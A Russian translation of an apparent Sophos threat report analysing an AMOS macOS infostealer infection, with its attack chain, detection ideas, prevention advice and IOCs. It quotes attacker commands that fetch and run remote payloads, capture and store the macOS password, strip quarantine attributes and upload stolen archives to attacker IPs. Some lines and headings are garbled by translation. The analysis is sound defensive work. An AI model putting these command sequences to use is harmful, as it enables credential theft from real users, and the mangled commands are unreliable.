Почему AMOS важен: вредоносное ПО для macOS, похищающее данные в больших масштабах.

Недавно команды Sophos Managed Detection and Response (MDR) отреагировали на инцидент с клиентом, связанный с заражением хоста macOS вредоносной программой, похищающей информацию. В ходе расследования мы обнаружили, что эта вредоносная программа, по всей видимости, является вариантом AMOS (Atomic macOS), известного семейства вредоносных программ, о котором мы писали ранее.

Атака началась с уловки в стиле ClickFix, когда пользователя обманом заставили выполнить команду в терминале. Это не первый случай использования подобной техники социальной инженерии в сочетании с программами для кражи информации из macOS; в марте этого года мы сообщали о нескольких вариантах программы для кражи данных MacSync, использующих тот же подход.

AMOS представляет собой серьёзную угрозу; на его долю приходилось почти 40% наших обновлений защиты macOS в 2025 году (более чем вдвое больше, чем на любое другое семейство вредоносных программ macOS), и почти половина сообщений клиентов о краже данных из macOS за последние три месяца (на момент написания этой статьи). Являясь частью сервиса «вредоносное ПО как услуга» (MaaS), он оптимизирован для кражи данных Keychain, учетных данных браузера, cookie-файлов, информации автозаполнения и других ценных артефактов (таких как информация о криптовалютных кошельках), что позволяет быстро захватывать учетные записи и проводить последующие атаки. Он отслеживается в публичных отчетах как минимум с апреля 2023 года.

Совсем недавно, в августе 2025 года, CrowdStrike сообщила о кампании, связанной с вариантом AMOS, получившим название «SHAMOS». В декабре 2025 года Huntress отметила инциденты, связанные с распространением AMOS через отравленные результаты поиска, относящиеся к беседам в ChatGPT/Grok, а в феврале 2026 года Microsoft упомянула AMOS в более широком контексте распространения вредоносного ПО через macOS, злоупотребляющего доверенными платформами и утилитами для распространения.

Как отмечалось во многих предыдущих отчетах, и как в случае, который мы расследовали, кампании AMOS обычно опираются на социальную инженерию, а не на цепочки эксплойтов. В некоторых случаях злоумышленники используют поддельные установщики или приманки в виде «взломанных приложений», хотя ClickFix, по-видимому, становится все более распространенным вектором заражения. Совсем недавно, как мы описали в нашей статье о MacSync, исследователи сообщили об использовании приманок, связанных с моделями искусственного интеллекта.

Однако эта социальная инженерия не ограничивается первоначальным заражением. Специалисты по кибербезопасности отмечают повторяющееся поведение: система постоянно запрашивает пароль до тех пор, пока жертва не предоставит свой пароль от macOS, который затем используется для выполнения привилегированных действий.

Обзор цепочки атак

1. Социальная инженерия — это метод, при котором пользователя убеждают выполнить команду в терминале.
2. На первом этапе загружается и выполняется скрипт начальной загрузки.
3. Вредоносная программа перехватывает и проверяет пароль пользователя macOS.
4. Полезная нагрузка второго этапа извлекается и выполняется с повышенными привилегиями.
5. Стандартные проверки, предотвращающие анализ, выявляют виртуализированные среды.
6. Вредоносное ПО собирает обширные данные о пользователях и системе (база данных связки ключей, пароли macOS, данные профилей Firefox и Chrome, заметки Apple, хранилище расширений, данные профилей хоста и системы, а также информация, связанная с криптовалютами).
7. Украденные данные архивируются и подготавливаются к извлечению.
8. Данные отправляются в инфраструктуру злоумышленника.
9. Сохранение данных осуществляется с помощью LaunchDaemon.
10. Система регистрируется на сервере управления и контроля (C2).

Самофинансирование

Команда, предоставленная на сайте, контролируемом злоумышленником (которую пользователю обманом заставили запустить в Терминале), загружает и выполняет скрипт начальной загрузки со следующей командой:

echo | base64 -d | bash curl -fsSL hxxps://sphereou[.]com/cleanera

Проверка пароля

Вредоносная программа запрашивает у пользователя пароль от системы macOS и проверяет его локально. После проверки пароль сохраняется в скрытом файле для последующего использования.

username=$(whoami) dscl . -authonly «$username» «$password» echo -n «$password» > «/Users/$username/.pass»

Развертывание полезной нагрузки на втором этапе

После получения пароля вредоносная программа загружает дополнительную полезную нагрузку с hxxps[://]sphereou[.]com/cleaner3/update и сохраняет её в /tmp/update . Расширенные атрибуты удаляются, чтобы обойти предупреждения безопасности macOS, после чего файл запускается.

curl -o /tmp/update hxxps://sphereou[.]com/cleaner3/update echo «» | sudo -S xattr -c /tmp/update chmod +x /tmp/update /tmp/update

Антианализ

Чтобы избежать автоматического обнаружения, вредоносная программа проверяет, работает ли она в виртуальной машине или в изолированной среде, запрашивая данные system_profiler через osascript и ища определенные значения оборудования.

Проверяемые показатели включают:

• QEMU
• VMware
• КВМ

Сбор учетных данных и данных о сессиях

Вредоносная программа подготавливает каталоги в /tmp для хранения собранных данных. Она также получает UUID оборудования для уникальной идентификации системы жертвы и выполняет базовое перечисление хостов:

whoami, id, hostname, ioreg IOPlatformUUID

Примеры путей для промежуточного тестирования:
/tmp/91897/
/tmp/91897/FileGrabber/NotesMedia/

В расследованном нами случае злоумышленник использовал несколько флагов конфигурации AMOS ( CONFIG_STEAL_FINDER , CONFIG_STEAL_NOTES_API и CONFIG_STEAL_HISTORY ) для управления процедурами сбора данных.

AMOS продолжает сбор широкого спектра конфиденциальных данных, включая:

• База данных Keychain для macOS
• Данные браузера Firefox (файлы cookie, сохраненные пароли, история форм)
• Профили Chrome/Chromium
• Файлы хранилища расширений и IndexedDB
• Локальные токены сессии браузера

В проанализированном нами варианте набор модулей AMOS также включал поддельные приложения Ledger Wallet и Trezor Suite, что указывает на возможности, связанные с кражей учетных данных и сид-фраз в криптовалюте.

Архивирование и извлечение информации

Собранные файлы сжимаются в единый архив с помощью утилит macOS, после чего отправляются на сервер, контролируемый злоумышленником.

ditto -c -k —sequesterRsrc /tmp/91897/ /tmp/out.zip curl -X POST -F «file=@/tmp/out.zip» hxxp://38[.]244[.]158[.]56/contact

Упорство

Для обеспечения долговременного доступа злоумышленник добивается сохранения доступа с помощью LaunchDaemon . В пользовательском каталоге хранится скрытый вспомогательный исполняемый файл, настроенный на автоматический запуск.

Пример пути сохранения данных:
/Library/LaunchDaemons/com.finder.helper.plist

С2

Заражённая система регистрируется на сервере управления и контроля (C2) и периодически получает инструкции. Примеры конечных точек C2:
hxxp://45[.]94[.]47[.]204/api/join/
hxxp://45[.]94[.]47[.]204/api/tasks/

Рисунок 1: Цепочка атак AMOS

MITRE ATT&CK mapping

Обеспечение безопасности

Возможности обнаружения

• попытки аутентификации DSCL с последующим скрытым хранением паролей
• Создание временных каталогов в /tmp
• Сжатие больших наборов данных учетных данных с помощью Ditto.
• Исходящие POST-запросы curl , отправляющие архивные файлы на внешние IP-адреса.
• Создание LaunchDaemon с правами root.
• Доступ к хранилищам учетных данных браузера и путям доступа к данным, относящимся к заметкам/связке ключей, из нестандартных процессов.
• К артефактам, находящимся на стороне хоста, могут относиться:
  • /Users//.pass
  • /tmp/update
  • /tmp/91897/
  • /tmp/out.zip
  • /Users//.agent
  • /Users//.mainhelper — /Library/LaunchDaemons/com.finder.helper.plist

Возможности профилактики

• Блокировка и оповещение о действиях пользователя, инициированных путем вставки и запуска файлов через терминал (в стиле ClickFix).
• Ввести обязательные требования к привратнику и нотариальному заверению; запретить использование настроек исполнения «В любом месте».
• Постоянно включайте и обновляйте XProtect и обновления безопасности системы, обеспечивая их полную актуальность.
• По умолчанию права локального администратора отключены; повышение привилегий требуется только при необходимости.
• Блокировать выполнение неподписанных/ненадежных бинарных файлов из скрытых путей в домашней директории пользователя (исполняемые файлы с префиксом в виде точки).
• Отслеживание и оповещение о новых/измененных LaunchDaemon в /Library/LaunchDaemons/ (например, com.finder.helper.plist )
• Ограничить установку неутвержденных приложений для кошельков/криптовалют.

Защита Sophos

• OSX-CRD-PRC-STEAL-BROWSER-DATA-1
• OSX-COL-PRC-SUSP-DITTO-1
• OSX/Infostl-FH
• OSX/InfoStl-GA

Заключение

В настоящее время распространенные вредоносные программы регулярно поражают пользователей macOS, особенно программы-похитители информации, на долю которых приходится значительная часть всех обнаружений macOS, зафиксированных в телеметрии.

В частности, AMOS по-прежнему представляет собой серьезную проблему. Как и многие подобные ему вредоносные программы, она использует методы социальной инженерии для обхода средств защиты, что делает ее серьезной угрозой. Как мы отмечали в нашей статье о MacSync, конкретные методы, используемые злоумышленниками, продолжают адаптироваться в ответ на более широкие социальные и технологические тенденции.

Мы продолжим отслеживать и расследовать случаи заражения macOS вредоносным ПО, похищающим информацию, обновлять информацию о защите и обнаружении по мере необходимости, а также публиковать результаты исследований в этой быстро развивающейся области угроз по мере поступления данных.

Индикаторы компрометации (IOC), относящиеся к данной статье, будут доступны в нашем репозитории GitHub.

Благодарности

Компания Sophos X-Ops выражает благодарность Джагадишу Чандрайе из SophosLabs за его вклад в подготовку этого отчета.